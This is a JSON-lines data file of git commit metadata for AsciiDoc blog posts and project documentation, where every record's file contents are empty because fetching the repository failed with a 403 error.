{"commit":"8e0db75303618c73b658d3a7c0897b330b585435","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"143cf77988083d203f1341855c00ccaf07e5e202","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"767c8ac7d21226f5c516b8cb679e5d6a7b0be5db","subject":"y2b create post iPad Air 2 Unboxing","message":"y2b create post iPad Air 2 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-10-24-iPad-Air-2-Unboxing.adoc","new_file":"_posts\/2014-10-24-iPad-Air-2-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"950e59521a511d41afd838028d76b48937e50fde","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b2bde4d873dfc1f85ec165379c9012d29c172e7c","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ebb1e9f453c0edfe213e8de3a35bce46b90ad7f6","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d94bb93c4a8700e8c761b38f3befe09bc0596a81","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a4d250757d8bf4169da317d5c085d05c34617454","subject":"Fixed for the other image too...","message":"Fixed for the other image too...","repos":"lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"dff5c8ca866f2bbd8125398bfb53acbaf4034de7","subject":"Update 2015-07-24-Why-I-do-things.adoc","message":"Update 2015-07-24-Why-I-do-things.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-24-Why-I-do-things.adoc","new_file":"_posts\/2015-07-24-Why-I-do-things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"cadd4ea3a7fc92ecbfe9e8f0fe643182e5ff46b5","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"569bfa907b33edca22b79d66fab9dcc0bd3c4660","subject":"copy from template","message":"copy from template","repos":"tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/FtpMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/FtpMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"}
{"commit":"351f9ac082107f68d61db09084729fef6ead5a2e","subject":"Added document in the repo","message":"Added document in the repo\n","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"ab158026cec0969eef997f75d3c5592c43f25863","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"caff75abfacf0db89254a603aa14fc3f2ee99b3e","subject":"Update 2015-09-15-HP-Because-The-Right-Color-Matters.adoc","message":"Update 2015-09-15-HP-Because-The-Right-Color-Matters.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-15-HP-Because-The-Right-Color-Matters.adoc","new_file":"_posts\/2015-09-15-HP-Because-The-Right-Color-Matters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"34b2d5e117a38b59895731088bfe7d95a55bede0","subject":"Delete 3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","message":"Delete 3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"532ab24c55cbeeafc924da97c9e9690b5633cc39","subject":"layout fixes","message":"layout fixes\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"481829897ee2d37f2d8fa4ac8c403bcffe07a063","subject":"Create InstallAndroid.adoc","message":"Create InstallAndroid.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/InstallAndroid.adoc","new_file":"wiki\/InstallAndroid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"83b249153dbd7d825968f880d76a035e7f42c1fb","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"17fa481ee8b4d5a9159f0d86d2e3b3b4a148e4ae","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"311fdbd8207b1904825ffaf1ee11c13493f0073e","subject":"Update 2015-07-16-The-Arrival-Part-I.adoc","message":"Update 2015-07-16-The-Arrival-Part-I.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-The-Arrival-Part-I.adoc","new_file":"_posts\/2015-07-16-The-Arrival-Part-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1256c25052e59267592acb4b86debefc58496205","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6a5142479d5c902dcad42a8f81aae50311ef2eba","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"269bfa0fe651d6438ac45033abf9a165db0e4700","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8bfa871ce6e22bdf8fa249a64e238885e1022a8a","subject":"Update 2017-09-21-My-First-Post.adoc","message":"Update 2017-09-21-My-First-Post.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-21-My-First-Post.adoc","new_file":"_posts\/2017-09-21-My-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d5c9d4feda7b79a42830a4c2c0fca7e7bed7e1c9","subject":"y2b create post iPhone 6S Battery Case - Design Failure?","message":"y2b create post iPhone 6S Battery Case - Design Failure?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-08-iPhone-6S-Battery-Case--Design-Failure.adoc","new_file":"_posts\/2015-12-08-iPhone-6S-Battery-Case--Design-Failure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d5ad6a440a3fc55eed9b6971d454120dbf1a278d","subject":"docs - Convert index.adoc content format to asciidoc","message":"docs - Convert index.adoc content format to asciidoc\n","repos":"davidkarlsen\/camel,Fabryprog\/camel,Fabryprog\/camel,nicolaferraro\/camel,cunningt\/camel,punkhorn\/camel-upstream,gnodet\/camel,cunningt\/camel,DariusX\/camel,gnodet\/camel,pax95\/camel,objectiser\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,christophd\/camel,nicolaferraro\/camel,tadayosi\/camel,tadayosi\/camel,tdiesler\/camel,christophd\/camel,nicolaferraro\/camel,tdiesler\/camel,gnodet\/camel,objectiser\/camel,davidkarlsen\/camel,DariusX\/camel,pax95\/camel,CodeSmell\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,pmoerenhout\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,objectiser\/camel,DariusX\/camel,Fabryprog\/camel,apache\/camel,Fabryprog\/camel,christophd\/camel,punkhorn\/camel-upstream,tadayosi\/camel,CodeSmell\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,adessaigne\/camel,nikhilvibhav\/camel,gnodet\/camel,nikhilvibhav\/camel,gnodet\/camel,zregvart\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,cunningt\/camel,DariusX\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,adessaigne\/camel,zregvart\/camel,objectiser\/camel,christophd\/camel,ullgren\/camel,mcollovati\/camel,davidkarlsen\/camel,ullgren\/camel,alvinkwekel\/camel,CodeSmell\/camel,tdiesler\/camel,tdiesler\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,pax95\/camel,punkhorn\/camel-upstream","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/index.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"9bc4aa5824835c7a70676db753ee8a45cd260dbd","subject":"Update 2016-04-01-dragonfly-dynamic-s3-cdn.adoc","message":"Update 2016-04-01-dragonfly-dynamic-s3-cdn.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-01-dragonfly-dynamic-s3-cdn.adoc","new_file":"_posts\/2016-04-01-dragonfly-dynamic-s3-cdn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0ec5dd2e4bb20a802293c71be83a3be1264ab98b","subject":"Update 2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","message":"Update 2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","repos":"javiersantos\/javiersantos.github.io,javiersantos\/javiersantos.github.io","old_file":"_posts\/2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","new_file":"_posts\/2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javiersantos\/javiersantos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"72dd532fd2170b2210f8ff8e4113554b56f04c6f","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-zookeeper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"ef0afd844222f8ff533576a14216c8a9ed482fcc","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-consul,spring-cloud\/spring-cloud-consul,spring-cloud\/spring-cloud-consul","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-consul.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"2a2561460164ec83a1283ac9769798bf3ce78361","subject":"Update 2015-09-03-Setting-up-new-HubPress-site.adoc","message":"Update 2015-09-03-Setting-up-new-HubPress-site.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-03-Setting-up-new-HubPress-site.adoc","new_file":"_posts\/2015-09-03-Setting-up-new-HubPress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8df9a0a62960afed0e4b15a73e8f663859edf3d4","subject":"[#410] Added article: Picocli on GraalVM: Blazingly Fast Command Line Apps","message":"[#410] Added article: Picocli on GraalVM: Blazingly Fast Command Line Apps\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/picocli-on-graalvm.adoc","new_file":"docs\/picocli-on-graalvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"483fb050294314ced429347d1857a7f0330eae91","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"39b7a34db55b9fc81f49b5259e2fe1a9b5120d96","subject":"Added sections 1.1, 1.2 and 1.3.","message":"Added sections 1.1, 1.2 and 1.3.\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"}
{"commit":"d1709b35ba311b8f39b17c1e1c4f4101624328ee","subject":"Update 2018-09-10-sparkle.adoc","message":"Update 2018-09-10-sparkle.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-10-sparkle.adoc","new_file":"_posts\/2018-09-10-sparkle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"61dd905af3cc99fd120c73a4d609814a114c2e84","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"556c3b13879511f9a67c2d74d038c601ad885570","subject":"Initial debugging guide","message":"Initial debugging guide\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/debugging.adoc","new_file":"userguide\/tutorials\/debugging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}